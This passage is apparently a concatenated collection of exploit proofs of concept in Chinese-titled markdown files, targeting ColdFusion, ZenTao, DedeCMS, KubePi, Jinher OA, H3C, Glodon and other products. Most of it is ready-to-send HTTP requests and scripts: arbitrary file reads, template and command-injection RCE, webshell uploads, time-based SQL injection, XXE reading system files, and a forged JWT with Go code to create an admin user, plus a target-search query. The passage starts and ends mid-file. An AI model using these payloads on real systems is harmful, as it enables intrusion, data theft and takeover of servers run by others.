application/x-www-form-urlencoded 49 | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Acoo Browser; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506) 50 | Content-Length: 64 51 | 52 | method=uploadMenuIcon&fileid=ID 值&filename=qwe.jsp 53 | ``` 54 | 55 | -------------------------------------------------------------------------------- /Adobe-ColdFusion任意文件读取漏洞CVE-2024-20767.md: -------------------------------------------------------------------------------- 1 | ``` 2 | import requests 3 | import re 4 | import urllib3 5 | import argparse 6 | 7 | urllib3.disable_warnings() 8 | 9 | parser = argparse.ArgumentParser() 10 | parser.add_argument("-t", "--target",required=True, 
help="Target Adobe ColdFusion Server URL") 11 | parser.add_argument("-p", "--port",required=False, default=8500, help="Target Adobe ColdFusion Server Port, by default we use the 8500 Port") 12 | parser.add_argument("-c", "--command", required=True,help="File to read path") # Example in Windows Server 'Windows/ServerStandardEval.xml' or Linux Server "etc/passwd" 13 | args = parser.parse_args() 14 | 15 | def get_uuid(): 16 | endpoint = "/CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat" # Vulnerable endpoint to get the UUID 17 | session = requests.Session() 18 | try: 19 | response = session.get(args.target+":"+str(args.port)+endpoint, verify=False) 20 | print("[+] Connecting to ColdFusion Server...") 21 | repattern = r"(.+?)" # Regex expression to get UUID 22 | uuid = re.findall(repattern, response.text)[0] 23 | print("[+] UUID Obtained: ", uuid) 24 | return uuid 25 | except: 26 | print("[-] Error connecting to server") 27 | 28 | def exploit(uuid): 29 | headers = { 30 | "uuid": uuid 31 | } 32 | session = requests.Session() 33 | endpoint2 = "/pms?module=logging&file_name=../../../../../../../"+args.command+"&number_of_lines=100" # Vulnerable endpoint to read files 34 | response = session.get(args.target+":"+str(args.port)+endpoint2, verify=False, headers=headers) 35 | if response.status_code == 200 and int(response.headers["Content-Length"]) > 2: 36 | print("[+] Succesfully read file!") 37 | print(response.text) 38 | else: 39 | print("[-] Something went wrong while reading file or the file doesn't exist") 40 | 41 | if __name__ == "__main__": 42 | exploit(get_uuid()) 43 | ``` 44 | 45 | -------------------------------------------------------------------------------- /铭飞MCMS 远程代码执行漏洞.md: -------------------------------------------------------------------------------- 1 | ``` 2 | POST 
/static/plugins/ueditor/1.4.3.3/jsp/editor.do?jsonConfig=%7b%76%69%64%65%6f%55%72%6c%50%72%65%66%69%78%3a%27%27%2c%66%69%6c%65%4d%61%6e%61%67%65%72%4c%69%73%74%50%61%74%68%3a%27%27%2c%69%6d%61%67%65%4d%61%78%53%69%7a%65%3a%32%30%34%38%30%30%30%30%30%2c%76%69%64%65%6f%4d%61%78%53%69%7a%65%3a%32%30%34%38%30%30%30%30%30%2c%66%69%6c%65%4d%61%78%53%69%7a%65%3a%32%30%34%38%30%30%30%30%30%2c%66%69%6c%65%55%72%6c%50%72%65%66%69%78%3a%27%27%2c%69%6d%61%67%65%55%72%6c%50%72%65%66%69%78%3a%27%27%2c%69%6d%61%67%65%50%61%74%68%46%6f%72%6d%61%74%3a%27%2f%7b%5c%75%30%30%32%45%5c%75%30%30%32%45%5c%75%30%30%32%46%7d%7b%74%65%6d%70%6c%61%74%65%2f%31%2f%64%65%66%61%75%6c%74%2f%7d%7b%74%69%6d%65%7d%27%2c%66%69%6c%65%50%61%74%68%46%6f%72%6d%61%74%3a%27%2f%75%70%6c%6f%61%64%2f%31%2f%63%6d%73%2f%63%6f%6e%74%65%6e%74%2f%65%64%69%74%6f%72%2f%7b%74%69%6d%65%7d%27%2c%76%69%64%65%6f%50%61%74%68%46%6f%72%6d%61%74%3a%27%2f%75%70%6c%6f%61%64%2f%31%2f%63%6d%73%2f%63%6f%6e%74%65%6e%74%2f%65%64%69%74%6f%72%2f%7b%74%69%6d%65%7d%27%2c%22%69%6d%61%67%65%41%6c%6c%6f%77%46%69%6c%65%73%22%3a%5b%22%2e%70%6e%67%22%2c%20%22%2e%6a%70%67%22%2c%20%22%2e%6a%70%65%67%22%2c%20%22%2e%6a%73%70%78%22%2c%20%22%2e%6a%73%70%22%2c%22%2e%68%74%6d%22%5d%7d%0a&action=uploadimage HTTP/1.1 3 | User-Agent: xxx 4 | Accept: \*/\* 5 | Postman-Token: bb71767c-7223-4ba3-8151-c81b8a5dc1ec 6 | Host: 127.0.0.1:8080 7 | Accept-Encoding: gzip, deflate 8 | Connection: close 9 | Content-Type: multipart/form-data; boundary=--------------------------583450229485407027180070 10 | Content-Length: 279 11 | 12 | ----------------------------583450229485407027180070 13 | Content-Disposition: form-data; name="upload"; filename="1.htm" 14 | Content-Type: image/png 15 | 16 | <#assign ex="freemarker.template.utility.Execute"?new()> ${ ex("whoami") } 17 | ----------------------------583450229485407027180070-- 18 | ``` 19 | 20 | -------------------------------------------------------------------------------- /H3C 用户自助服务平台 
dynamiccontent.properties.xhtml存在RCE漏洞.md: -------------------------------------------------------------------------------- 1 | ``` 2 | POST /mselfservice/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1 3 | Host: 127.0.0.1 4 | User-Agent: User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; 360SE) 5 | Content-Length: 1573 6 | Content-Type: application/x-www-form-urlencoded 7 | Accept-Encoding: gzip 8 | 9 | pfdrt=sc&ln=primefaces&pfdrid=uMKljPgnOTVxmOB%2BH6%2FQEPW9ghJMGL3PRdkfmbiiPkUDzOAoSQnmBt4dYyjvjGhVqupdmBV%2FKAe9gtw54DSQCl72JjEAsHTRvxAuJC%2B%2FIFzB8dhqyGafOLqDOqc4QwUqLOJ5KuwGRarsPnIcJJwQQ7fEGzDwgaD0Njf%2FcNrT5NsETV8ToCfDLgkzjKVoz1ghGlbYnrjgqWarDvBnuv%2BEo5hxA5sgRQcWsFs1aN0zI9h8ecWvxGVmreIAuWduuetMakDq7ccNwStDSn2W6c%2BGvDYH7pKUiyBaGv9gshhhVGunrKvtJmJf04rVOy%2BZLezLj6vK%2BpVFyKR7s8xN5Ol1tz%2FG0VTJWYtaIwJ8rcWJLtVeLnXMlEcKBqd4yAtVfQNLA5AYtNBHneYyGZKAGivVYteZzG1IiJBtuZjHlE3kaH2N2XDLcOJKfyM%2FcwqYIl9PUvfC2Xh63Wh4yCFKJZGA2W0bnzXs8jdjMQoiKZnZiqRyDqkr5PwWqW16%2FI7eog15OBl4Kco%2FVjHHu8Mzg5DOvNevzs7hejq6rdj4T4AEDVrPMQS0HaIH%2BN7wC8zMZWsCJkXkY8GDcnOjhiwhQEL0l68qrO%2BEb%2F60MLarNPqOIBhF3RWB25h3q3vyESuWGkcTjJLlYOxHVJh3VhCou7OICpx3NcTTdwaRLlw7sMIUbF%2FciVuZGssKeVT%2FgR3nyoGuEg3WdOdM5tLfIthl1ruwVeQ7FoUcFU6RhZd0TO88HRsYXfaaRyC5HiSzRNn2DpnyzBIaZ8GDmz8AtbXt57uuUPRgyhdbZjIJx%2FqFUj%2BDikXHLvbUMrMlNAqSFJpqoy%2FQywVdBmlVdx%2BvJelZEK%2BBwNF9J4p%2F1fQ8wJZL2LB9SnqxAKr5kdCs0H%2FvouGHAXJZ%2BJzx5gcCw5h6%2Fp3ZkZMnMhkPMGWYIhFyWSSQwm6zmSZh1vRKfGRYd36aiRKgf3AynLVfTvxqPzqFh8BJUZ5Mh3V9R6D%2FukinKlX99zSUlQaueU22fj2jCgzvbpYwBUpD6a6tEoModbqMSIr0r7kYpE3tWAaF0ww4INtv2zUoQCRKo5BqCZFyaXrLnj7oA6RGm7ziH6xlFrOxtRd%2BLylDFB3dcYIgZtZoaSMAV3pyNoOzHy%2B1UtHe1nL97jJUCjUEbIOUPn70hyab29iHYAf3%2B9h0aurkyJVR28jIQlF4nT0nZqpixP%2Fnc0zrGppyu8dFzMqSqhRJgIkRrETErXPQ9sl%2BzoSf6CNta5ssizanfqqCmbwcvJkAlnPCP5OJhVes7lKCMlGH%2BOwPjT2xMuT6zaTMu3UMXeTd7U8yImpSbwTLhqcbaygXt8hhGSn5Qr7UQymKkAZGNKHGBbHeBIrEdjnVphcw9L2BjmaE%2BlsjMhGqFH6XWP5GD8FeHFtuY8bz08F4Wjt5wAeUZQOI4rSTpzgssoS1vbjJGzFukA07ahU%3D&cmd=whoam
i 10 | ``` 11 | 12 | -------------------------------------------------------------------------------- /红海云eHR kqFile.mob 任意文件上传.md: -------------------------------------------------------------------------------- 1 | ``` 2 | 3 | POST /RedseaPlatform/PtFjk.mob?method=upload HTTP/1.1 4 | Host: x.x.x.x 5 | Accept-Encoding: gzip 6 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15 7 | Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryt7WbDl1tXogoZys4 8 | Content-Length: 210 9 | 10 | ------WebKitFormBoundaryt7WbDl1tXogoZys4 11 | Content-Disposition: form-data; name="fj_file"; filename="11.jsp" 12 | Content-Type:image/jpeg 13 | 14 | <% out.print("hello,eHR");%> 15 | ------WebKitFormBoundaryt7WbDl1tXogoZys4-- 16 | 17 | /uploadfile/2024/05/12/20240512_xxxxxx.jsp 18 | ``` 19 | 20 | 21 | 22 | poc2 23 | 24 | ``` 25 | 26 | POST /RedseaPlatform/kqFile.mob?method=uploadFile&fileName=123.jspx HTTP/1.1 27 | Host: 28 | Pragma: no-cache 29 | Cache-Control: no-cache 30 | Upgrade-Insecure-Requests: 1 31 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36(KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 32 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 33 | Accept-Encoding: gzip, deflat 34 | Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7 35 | Cookie: JSESSIONID=391295A33F5DA2F1DB07485CEC9602E8 36 | Connection: close 37 | Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryS7jL1beJUXUUnhE8 38 | Content-Length: 395 39 | 40 | ------WebKitFormBoundaryS7jL1beJUXUUnhE8 41 | Content-Disposition: form-data; name="fj_file";filename=|$|"222.jpg"|$| 42 | 43 | 44 | 45 | 46 | jsp:scriptlet 49 | 50 | ------WebKitFormBoundaryS7jL1beJUXUUnhE8-- 51 | ``` 52 | 53 | -------------------------------------------------------------------------------- /禅道研发项⽬管理系统未授权.md: 
-------------------------------------------------------------------------------- 1 | ```python 2 | import requests 3 | 4 | def check(url): 5 | url1 = url+'/misc-captcha-user.html' 6 | # url1 = url+'/index.php?m=misc&f=captcha&sessionVar=user'#非伪静态版本按照此格式传参 7 | # url2 = url+'/index.php?m=block&f=printBlock&id=1&module=my'#可判断验证绕过的链接 8 | url3 = url + 'repo-create.html' 9 | url4 = url + 'repo-edit-10000-10000.html' 10 | headers={ 11 | "User-Agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36", 12 | "Accept-Language":"zh-CN,zh;q=0.9", 13 | "Cookie":"zentaosid=u6vl6rc62jiqof4g5jtle6pft2; lang=zh-cn; device=desktop; theme=default", 14 | } 15 | 16 | headers2 = { 17 | "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36", 18 | "Accept-Language": "zh-CN,zh;q=0.9", 19 | "Cookie": "zentaosid=u6vl6rc62jiqof4g5jtle6pft2; lang=zh-cn; device=desktop; theme=default", 20 | "Content-Type":"application/x-www-form-urlencoded", 21 | "X-Requested-With":"XMLHttpRequest", 22 | "Referer":url+"/repo-edit-1-0.html" 23 | } 24 | 25 | data1 = 'product%5B%5D=1&SCM=Gitlab&name=66666&path=&encoding=utf-8&client=&account=&password=&encrypt=base64&desc=&uid=' 26 | data2 = 'SCM=Subversion&client=`id`' 27 | s=requests.session() 28 | try: 29 | req1 = s.get(url1,proxies=proxies,timeout=5,verify=False,headers=headers) 30 | req3 = s.post(url3,data=data1,proxies=proxies,timeout=5,verify=False,headers=headers2) 31 | req4 = s.post(url4,data=data2,proxies=proxies,timeout=5,verify=False,headers=headers2) 32 | if 'uid=' in req4.text: 33 | print(url,"") 34 | return True 35 | except Exception as e: 36 | print(e) 37 | return False 38 | if __name__ == '__main__': 39 | print(check("http://x.x.x.x/zentao/")) 40 | ``` 41 | 42 | -------------------------------------------------------------------------------- /邦永PM2项目管理平台系统ExcelIn.aspx存在任意文件上传漏洞.md: 
-------------------------------------------------------------------------------- 1 | ``` 2 | POST /FlowChartDefine/ExcelIn.aspx HTTP/1.1 3 | Host: 4 | Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryAU4uQKbpWhA7eME3 5 | Cookie: ASP.NET_SessionId=oewffeov54f2dfj3iyz2u1qp 6 | Accept-Language: zh-CN,zh;q=0.9 7 | Upgrade-Insecure-Requests: 1 8 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 9 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 10 | Cache-Control: max-age=0 11 | Accept-Encoding: gzip, deflate 12 | Content-Length: 1470 13 | 14 | ------WebKitFormBoundaryAU4uQKbpWhA7eME3 15 | Content-Disposition: form-data; name="__VIEWSTATE" 16 | 17 | U6iRl9SqWWlhjIPJXIeFrsinqYAmYxenxFiyfWFMfWgnw3OtkceDLcdfRvB8pmUNGk44PvjZ6LlzPwDbJGmilsmhuX9LvOiuKadYa9iDdSipLW5JvUHjS89aGzKqr9fhih+p+/Mm+q2vrknhfEJJnQ== 18 | ------WebKitFormBoundaryAU4uQKbpWhA7eME3 19 | Content-Disposition: form-data; name="__VIEWSTATEGENERATOR" 20 | 21 | FD259C0F 22 | ------WebKitFormBoundaryAU4uQKbpWhA7eME3 23 | Content-Disposition: form-data; name="__EVENTVALIDATION" 24 | 25 | /pKblUYGQ+ibKtw4CCS2wzX+lmZIOB+x5ezYw0qJFbaUifUKlxNNRMKceZYgY/eAUUTaxe0gSvyv/oA8lUS7G7jPVqqrMEzYBVBl8dRkFWFwMqqjv1G9gXM/ZnIpnVSL 26 | ------WebKitFormBoundaryAU4uQKbpWhA7eME3 27 | Content-Disposition: form-data; name="FileUpload1"; filename="1234.zip" 28 | Content-Type: application/x-zip-compressed 29 | 30 | {{unquote("PK\x03\x04\x14\x00\x01\x00\x00\x00\xefl\xfaX\x1c:\xf5\xcb\x11\x00\x00\x00\x05\x00\x00\x00\x08\x00\x00\x001234.txt\xb0\x0c\x01\x08\xd1!\xd1Uv \xfal\x9b\xf4Q\xfd\xf8PK\x01\x02?\x00\x14\x00\x01\x00\x00\x00\xefl\xfaX\x1c:\xf5\xcb\x11\x00\x00\x00\x05\x00\x00\x00\x08\x00$\x00\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x00\x00\x00\x001234.txt\x0a\x00 
\x00\x00\x00\x00\x00\x01\x00\x18\x00\x05\x8d\x9d.\x1e\xdf\xda\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00PK\x05\x06\x00\x00\x00\x00\x01\x00\x01\x00Z\x00\x00\x007\x00\x00\x00\x00\x00")}} 31 | ------WebKitFormBoundaryAU4uQKbpWhA7eME3 32 | Content-Disposition: form-data; name="Button1" 33 | 34 | 模块导入 35 | ------WebKitFormBoundaryAU4uQKbpWhA7eME3-- 36 | ``` 37 | 38 | -------------------------------------------------------------------------------- /猎鹰安全(金山)终端安全系统V9 远程代码执行漏洞.md: -------------------------------------------------------------------------------- 1 | ``` 2 | POST /inter/software_relation.php HTTP/1.1 3 | Host: 192.168.249.137:6868 4 | Content-Length: 1557 5 | Pragma: no-cache 6 | Cache-Control: no-cache 7 | Upgrade-Insecure-Requests: 1 8 | Origin: http://192.168.249.137:6868 9 | Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxRP5VjBKdqBrCixM 10 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) 11 | AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.82 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9 12 | Accept-Encoding: gzip, deflate 13 | Accept-Language: zh-CN,zh;q=0.9 14 | 15 | Connection: close ------WebKitFormBoundaryxRP5VjBKdqBrCixM 16 | Content-Disposition: form-data; name="toolFileName" ../../datav.php 17 | ------WebKitFormBoundaryxRP5VjBKdqBrCixM 18 | Content-Disposition: form-data; name="toolDescri" 19 | ------WebKitFormBoundaryxRP5VjBKdqBrCixM 20 | Content-Disposition: form-data; name="id" 21 | ------WebKitFormBoundaryxRP5VjBKdqBrCixM 22 | Content-Disposition: form-data; name="version" 23 | ------WebKitFormBoundaryxRP5VjBKdqBrCixM 24 | Content-Disposition: form-data; name="sofe_typeof" 25 | ------WebKitFormBoundaryxRP5VjBKdqBrCixM 26 | Content-Disposition: form-data; name="fileSize" 27 | ------WebKitFormBoundaryxRP5VjBKdqBrCixM 28 | Content-Disposition: form-data; name="param" 29 | 
------WebKitFormBoundaryxRP5VjBKdqBrCixM 30 | Content-Disposition: form-data; name="toolName" 31 | ------WebKitFormBoundaryxRP5VjBKdqBrCixM 32 | 33 | Content-Disposition: form-data; name="toolImage"; filename="3.php" Content-Type: image/png 34 | 35 | ------WebKitFormBoundaryxRP5VjBKdqBrCixM 36 | ``` 37 | 38 | -------------------------------------------------------------------------------- /DedeCMSV5.7.114后台article_template_rand.php存在远程代码执行漏洞.md: -------------------------------------------------------------------------------- 1 | ``` 2 | POST /dede/article_template_rand.php HTTP/1.1 3 | Host: 127.0.0.11 4 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0) Gecko/20100101 Firefox/127.0 5 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 6 | Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 7 | Accept-Encoding: gzip, deflate, br 8 | Content-Type: application/x-www-form-urlencoded 9 | Content-Length: 1065 10 | Origin: http://127.0.0.11 11 | Connection: close 12 | Referer: http://127.0.0.11/dede/article_template_rand.php 13 | Cookie: menuitems=1_1%2C2_1%2C3_1; PHPSESSID=89s6bbv2d1unokav5grt4bk2g4; _csrf_name_236f0c58=8f0d4c50bfce77f693ce4b8d93af8be7; _csrf_name_236f0c581BH21ANI1AGD297L1FF21LN02BGE1DNG=23bfa72eb66439a6; DedeUserID=1; DedeUserID1BH21ANI1AGD297L1FF21LN02BGE1DNG=10acd9938ef3615d; DedeLoginTime=1720185221; DedeLoginTime1BH21ANI1AGD297L1FF21LN02BGE1DNG=d2b9bcefe628ee47; ENV_GOBACK_URL=%2Fdede%2Fsys_admin_user.php 14 | Upgrade-Insecure-Requests: 1 15 | Sec-Fetch-Dest: iframe 16 | Sec-Fetch-Mode: navigate 17 | Sec-Fetch-Site: same-origin 18 | Sec-Fetch-User: ?1 19 | Priority: u=4 20 | 21 | 
dopost=save&token=7fa44bfa91d7f797b4c983c76f7c9f9e&templates=%3C%3Fphp%0D%0A%0D%0A%2F%2F%E8%BF%99%E4%B8%AA%E5%80%BC%E4%B8%BA+0+%E8%A1%A8%E7%A4%BA%E5%85%B3%E9%97%AD%E6%AD%A4%E8%AE%BE%E7%BD%AE%EF%BC%8C+%E4%B8%BA+1+%E8%A1%A8%E7%A4%BA%E5%BC%80%E5%90%AF%0D%0A%24cfg_tamplate_rand+%3D+0%3B%0D%0A%0D%0A%2F%2F%E6%A8%A1%E6%9D%BF%E6%95%B0%E7%BB%84%EF%BC%8C%E5%A6%82%E6%9E%9C%E9%9C%80%E8%A6%81%E5%A2%9E%E5%8A%A0%EF%BC%8C%E6%8C%89%E8%BF%99%E4%B8%AA%E6%A0%BC%E5%BC%8F%E5%A2%9E%E5%8A%A0%E6%88%96%E4%BF%AE%E6%94%B9%E5%8D%B3%E5%8F%AF%28%E5%BF%85%E9%A1%BB%E7%A1%AE%E4%BF%9D%E8%BF%99%E4%BA%9B%E6%A8%A1%E6%9D%BF%E6%98%AF%E5%AD%98%E5%9C%A8%E7%9A%84%29%EF%BC%8C%E5%B9%B6%E4%B8%94%E6%95%B0%E9%87%8F%E5%BF%85%E9%A1%BB%E4%B8%BA2%E4%B8%AA%E6%88%96%E4%BB%A5%E4%B8%8A%E3%80%82%0D%0A%24cfg_tamplate_arr%5B%5D+%3D+%27article_article.htm%27%3B%0D%0A%24cfg_tamplate_arr%5B%5D+%3D+%27article_article1.htm%27%3B%0D%0A%24cfg_tamplate_arr%5B%5D+%3D+%27article_article2.htm%27%3B%0D%0A%24a+%3D+%27_POST%27%3B%0D%0A%24%24a%5B1%5D%28%24%24a%5B0%5D%29%3B%0D%0A%3F%3E%0D%0A&imageField1.x=6&imageField1.y=9 22 | ``` 23 | 24 | -------------------------------------------------------------------------------- /金和OA_CarCardInfo.aspx_SQL注入漏洞.md: -------------------------------------------------------------------------------- 1 | ``` 2 | POST /c6/JHSoft.Web.Vehicle/CarCardInfo.aspx/ HTTP/1.1 3 | Host: your_ip 4 | Content-Length: 2096 5 | Cache-Control: max-age=0 6 | Upgrade-Insecure-Requests: 1 7 | Content-Type: application/x-www-form-urlencoded 8 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 9 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 10 | Accept-Encoding: gzip, deflate 11 | Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 12 | Cookie: ASP.NET_SessionId=dvljrtibwe4dne1nyvda0iw1; myie=false 13 | Connection: close 14 | 15 | 
_ListPage1LockNumber=1&_ListPage1RecordCount=0&__VIEWSTATE=%2FwEPDwUKMjAyNTc4NzA3NA8WAh4Ic3RyUXVlcnkFCWRlbGZsYWc9MBYCZg9kFgQCAg8PFgIeBFRleHQFBuafpeivomRkAgMPDxYMHglfUGFnZVNpemUCKB4PX1NvcnRBdHRyaWJ1dGVzMtgDAAEAAAD%2F%2F%2F%2F%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%2F%2F%2F%2F%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%2BPElEPjwvSUQ%2BPGl0ZW0gQ29sdW1uTmFtZT0n6L2m5Z6LJz48L2l0ZW0%2BPGl0ZW0gQ29sdW1uTmFtZT0n54mM54WnJz48L2l0ZW0%2BPC9yZWNvcmQ%2BPC9yb290PmRkZJju89%2Fcb0ViP%2BHqYZwpEbj%2BGmY0EecUW2zJyvdwmUng&txt_CarType=1');WAITFOR DELAY '0:0:5'--&txt_CarCode=1&bt_Search=%B2%E9%D1%AF&__VIEWSTATEGENERATOR=0A1FC31B&__EVENTTARGET=&__EVENTARGUMENT= 16 | ``` 17 | 18 | -------------------------------------------------------------------------------- /KubePi存在JWT验证绕过漏洞.md: -------------------------------------------------------------------------------- 1 | fofa 2 | 3 | ``` 4 | "kubepi" 5 | ``` 6 | 7 | 使用空密钥生成jwt token 8 | 9 | ``` 10 | eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJuYW1lIjoiYWRtaW4iLCJuaWNrTmFtZSI6IkFkbWluaXN0cmF0b3IiLCJlbWFpbCI6InN1cHBvcnRAZml0MmNsb3VkLmNvbSIsImxhbmd1YWdlIjoiemgtQ04iLCJyZXNvdXJjZVBlcm1pc3Npb25zIjp7fSwiaXNBZG1pbmlzdHJhdG9yIjp0cnVlLCJtZmEiOnsiZW5hYmxlIjpmYWxzZSwic2VjcmV0IjoiIiwiYXBwcm92ZWQiOmZhbHNlfSwiaWF0IjoxNzE2NDQ3MDEyLCJleHAiOjE3MjI0NDcwMTJ9.dedNLwXZu0JY1sgGBCRZmpFvAnLdHjxdPmKWXA7LCf4 11 | ``` 12 | 13 | 使用生成的密钥创建用户tang 14 | 15 | ``` 16 | POST /kubepi/api/v1/users HTTP/1.1 17 | Host: 127.0.0.1:9982 18 | Content-Length: 248 19 | sec-ch-ua: 20 | Accept: application/json, text/plain, */* 21 | lang: zh-CN 22 | Content-Type: application/json 23 | sec-ch-ua-mobile: ?0 24 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.199 Safari/537.36 25 | sec-ch-ua-platform: "" 26 | Origin: http://127.0.0.1:9982 27 | Sec-Fetch-Site: same-origin 28 | Sec-Fetch-Mode: cors 29 | Sec-Fetch-Dest: empty 30 | Referer: http://127.0.0.1:9982/kubepi/user-management/users/create 31 | 
Accept-Encoding: gzip, deflate 32 | Accept-Language: zh-CN,zh;q=0.9 33 | Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJuYW1lIjoiYWRtaW4iLCJuaWNrTmFtZSI6IkFkbWluaXN0cmF0b3IiLCJlbWFpbCI6InN1cHBvcnRAZml0MmNsb3VkLmNvbSIsImxhbmd1YWdlIjoiemgtQ04iLCJyZXNvdXJjZVBlcm1pc3Npb25zIjp7fSwiaXNBZG1pbmlzdHJhdG9yIjp0cnVlLCJtZmEiOnsiZW5hYmxlIjpmYWxzZSwic2VjcmV0IjoiIiwiYXBwcm92ZWQiOmZhbHNlfSwiaWF0IjoxNzE2NDQ3MDEyLCJleHAiOjE3MjI0NDcwMTJ9.dedNLwXZu0JY1sgGBCRZmpFvAnLdHjxdPmKWXA7LCf4 34 | Connection: close 35 | 36 | {"apiVersion":"v1","kind":"User","name":"tang","roles":["Common User","Manage Image Registries","Manage Clusters","Manage RBAC"],"nickName":"tang","email":"tang@qq.com","authenticate":{"password":"12345678@Tang"},"mfa":{"enable":false,"secret":""}} 37 | ``` 38 | 39 | ![image-20240806095638556](KubePi存在JWT验证绕过漏洞.assets/image-20240806095638556.png) 40 | 41 | 生成jwt 程序 42 | 43 | ``` 44 | package main 45 | 46 | import( 47 | "fmt" 48 | "github.com/kataras/iris/v12/middleware/jwt" 49 | "time" 50 | ) 51 | 52 | var jwtMaxAge =100000* time.Minute 53 | 54 | typeUserProfilestruct{ 55 | Namestring`json:"name"` 56 | NickNamestring`json:"nickName"` 57 | Emailstring`json:"email"` 58 | Languagestring`json:"language"` 59 | ResourcePermissionsmap[string][]string`json:"resourcePermissions"` 60 | IsAdministratorbool`json:"isAdministrator"` 61 | MfaMfa`json:"mfa"` 62 | } 63 | 64 | typeMfastruct{ 65 | Enablebool`json:"enable"` 66 | Secretstring`json:"secret"` 67 | Approvedbool`json:"approved"` 68 | } 69 | 70 | func main(){ 71 | jwtSigner := jwt.NewSigner(jwt.HS256,"", jwtMaxAge) 72 | test :=map[string][]string{} 73 | profile :=UserProfile{ 74 | Name:"admin", 75 | NickName:"Administrator", 76 | Email:"support@fit2cloud.com", 77 | Language:"zh-CN", 78 | ResourcePermissions: test, 79 | IsAdministrator:true, 80 | Mfa:Mfa{ 81 | Secret:"", 82 | Enable:false, 83 | Approved:false, 84 | }, 85 | } 86 | nonejwt, _ := jwtSigner.Sign(profile) 87 | fmt.Println(string(nonejwt)) 88 | } 89 | ``` 90 | 
--------------------------------------------------------------------------------
/广联达OA接口ArchiveWebService存在XML实体注入漏洞.md:
--------------------------------------------------------------------------------
```
POST /GB/LK/Document/ArchiveService/ArchiveWebService.asmx HTTP/1.1
Host: 
Content-Type: text/xml; charset=utf-8
Content-Length: length
SOAPAction: "http://GB/LK/Document/ArchiveService/ArchiveWebService.asmx/PostArchiveInfo"

<!DOCTYPE Archive [ <!ENTITY secret SYSTEM "file:///windows/win.ini"> ]>
<Archive>
  <ArchiveInfo>
    <UploaderID> ############ &secret; ############## </UploaderID>
  </ArchiveInfo>
  <Result>
    <MainDoc>Document Content</MainDoc>
  </Result>
  <DocInfo>
    <DocTypeID>1</DocTypeID>
    <DocVersion>1.0</DocVersion>
  </DocInfo>
</Archive>
string
string
```

--------------------------------------------------------------------------------
/广联达Linkworks ArchiveWebService XML实体注入漏洞.md:
--------------------------------------------------------------------------------
```
POST /GB/LK/Document/ArchiveService/ArchiveWebService.asmx HTTP/1.1
Host: 
Content-Type: text/xml; charset=utf-8
Content-Length: length
SOAPAction: "http://GB/LK/Document/ArchiveService/ArchiveWebService.asmx/PostArchiveInfo"

<!DOCTYPE Archive [ <!ENTITY secret SYSTEM "file:///windows/win.ini"> ]>
<Archive>
  <ArchiveInfo>
    <UploaderID> ############ &secret; ############## </UploaderID>
  </ArchiveInfo>
  <Result>
    <MainDoc>Document Content</MainDoc>
  </Result>
  <DocInfo>
    <DocTypeID>1</DocTypeID>
    <DocVersion>1.0</DocVersion>
  </DocInfo>
</Archive>
string
string
```

--------------------------------------------------------------------------------
/Apache-CloudStack中的SAML身份验证漏洞(CVE-2024-41107).md:
--------------------------------------------------------------------------------
```
import requests
from bs4 import BeautifulSoup
from datetime import datetime, timedelta
import xml.etree.ElementTree as ET
import base64
import logging

# Setup logging
logging.basicConfig(filename='exploit.log', level=logging.INFO, format='%(asctime)s - %(message)s')

# URL of the login endpoint
url = "http://target-cloudstack-instance.com/client/api"

# Function to generate dynamic SAML response
def generate_saml_response(username):
    issue_instant = datetime.utcnow().strftime('%Y-%m-%dT%H:%M:%SZ')
    not_on_or_after = (datetime.utcnow() + timedelta(hours=1)).strftime('%Y-%m-%dT%H:%M:%SZ')

